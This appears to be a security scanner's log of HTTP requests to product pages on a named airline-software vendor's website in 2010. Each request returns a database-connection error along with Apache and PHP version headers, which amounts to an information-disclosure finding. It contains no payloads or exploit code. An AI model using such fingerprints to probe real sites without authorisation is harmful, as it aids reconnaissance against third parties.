GET /home/products_services/product/sabre_airvision_fares_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322720; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airvision_fleet_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322725; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A3%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A4%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airvision_group_ecommerce HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322733; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airvision_group_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322736; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fsabre_aircentre_airspace_flow_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:31:56 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airvision_in-flight HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322742; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A64%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_flight%2F%22%3Bi%3A3%3Bs%3A32%3A%22%2Fproducts_services%2Fweb_services%2F%22%3Bi%3A4%3Bs%3A72%3A%22%2Fproducts_services%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:32:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airvision_network_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322749; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_qik_analysis_system%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:56:13 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airvision_profit_essentials HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322747; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A1%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A3%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:56:15 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airvision_profit_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322766; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:56:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airvision_revenue_accounting HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322771; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_cargo_revenue_manager%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_planner%2F%22%3Bi%3A2%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fagency_management%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:57:34 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airvision_revenue_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322768; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airport_data_intelligence%2F%22%3Bi%3A1%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:58:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airvision_schedule_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322790; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fares_manager%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:00:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airvision_slot_manager_iata HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322786; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:03:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_emd_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322833; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:29:55 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_gds_display_analysis HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322813; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_network_manager%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A2%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:27:58 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_qik_analysis_system HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322810; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_in-flight%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A3%3Bs%3A64%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_flight%2F%22%3Bi%3A4%3Bs%3A32%3A%22%2Fproducts_services%2Fweb_services%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:03:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_reaccommodation_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322881; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_manager%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:32:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabresonic_check-in HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322881; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_manager%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:32:31 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabresonic_inventory HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322889; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:32:57 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabresonic_sell HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322881; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_network_manager%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:33:08 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
